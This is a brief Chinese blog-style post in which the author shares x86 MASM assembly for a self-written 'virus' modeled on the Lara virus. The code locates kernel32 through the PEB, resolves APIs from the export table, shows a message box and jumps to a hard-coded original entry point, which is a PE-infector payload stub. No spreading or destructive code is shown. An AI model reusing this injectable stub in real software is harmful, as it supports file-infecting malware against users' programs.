前年写的病毒,当时中了劳拉病毒,然后我照的它写了一个,参考了好多资料,主要是386汇编和PE文件结构的资料,个人感觉汇编什么的不是很难,当时我还不太熟悉宏汇编,不然可以有更简洁的代码
.486
.model flat, stdcall
option casemap :none
include /MASM32/INCLUDE/windows.inc
.code
start:
call pstart
pstart:
pop ebx ;mov ebx,dword ptr [esp]
sub ebx,offset pstart ;//ebx为重定位信息,现在应该是0
push ebp ;//保存程序开始时的EBP
mov ebp,esp
sub esp,80h ;//根据变量改变40h
mov dword ptr [ebp-4],ebx ;//保存到Pbase
;///getKernelBase///
mov eax, ss:[30h]
test eax,eax
js loc1
mov eax, dword ptr [eax + 0Ch]
mov esi, dword ptr [eax + 1Ch]
lodsd
mov eax, dword ptr [eax+8]
jmp loc2
loc1:
mov eax,dword ptr [eax+34h]
mov eax,dword ptr [eax+0B8h]
loc2:
mov dword ptr [ebp-10h],eax
push ebp ;//保存变量表指针EBP
mov ebp,eax ;//ebp=Kbase
;///Get GetProcAddress's EnterPoint//
mov eax,dword ptr [ebp+3Ch]
mov edx,dword ptr [ebp+eax+120]
add edx,ebp
mov ecx,dword ptr [edx+24] ;//number
mov ebx,dword ptr [edx+28] ;// at=esp+4
push dword ptr [edx+32] ;//npt=esp
;
mov edi,esp
sub edi,10h
mov dword ptr [edi],50746547h
mov dword ptr [edi+4],41636f72h ; 要改
mov dword ptr [edi+8],65726464h
mov dword ptr [edi+0Ch],00007373h
;
findstart:
dec ecx
xor edx,edx
mov esi,dword ptr [esp]
add esi,ebp
mov esi,dword ptr [esi]
add esi,ebp
cmpbyte:
lodsb
cmp al,byte ptr [edi+edx]
jne notsame
cmp edx,14
je find
inc edx
loop cmpbyte
jmp cantfind
notsame:
add dword ptr [esp],4
add ebx,4
jmp findstart
cantfind:
xor eax,eax
jmp findend
find:
add ebx,ebp
mov eax,dword ptr[ebx]
add eax,ebp
findend:
add esp,4
pop ebp ;//pop出变量表指针
mov dword ptr [ebp-0Ch],eax ;//保存GetProcAddress的函数入口点
;/
mov ebx,dword ptr [ebp-4]
mov edx,offset LoadLibrary ;//LoadLibrary
add edx,ebx
push edx
push dword ptr [ebp-10h]
call dword ptr [ebp-0Ch] ;//获得LoadLibrary的地址
mov dword ptr [ebp-14h],eax
mov edx,offset USER32 ;//user32.dll
add edx,ebx
push edx
call eax ;//调用LoadLibrary
mov edx,offset messagebox ;//user32.dll
add edx,ebx
push edx
push eax
call dword ptr [ebp-0Ch] ;//获得MessageBoxA的地址
push 0
push edx
push edx
push 0
call eax
nop
nop
;//
add esp,80h ;//根据变量改变40h
pop ebp
jmp pend
;
LoadLibrary:
db "LoadLibraryA",0
USER32:
db "user32.dll",0
messagebox:
db "MessageBoxA",0
pend:
mov eax,0041c560h ;//转到正常的程序入口点
jmp eax
nop
nop
nop
nop
nop
nop
nop
end start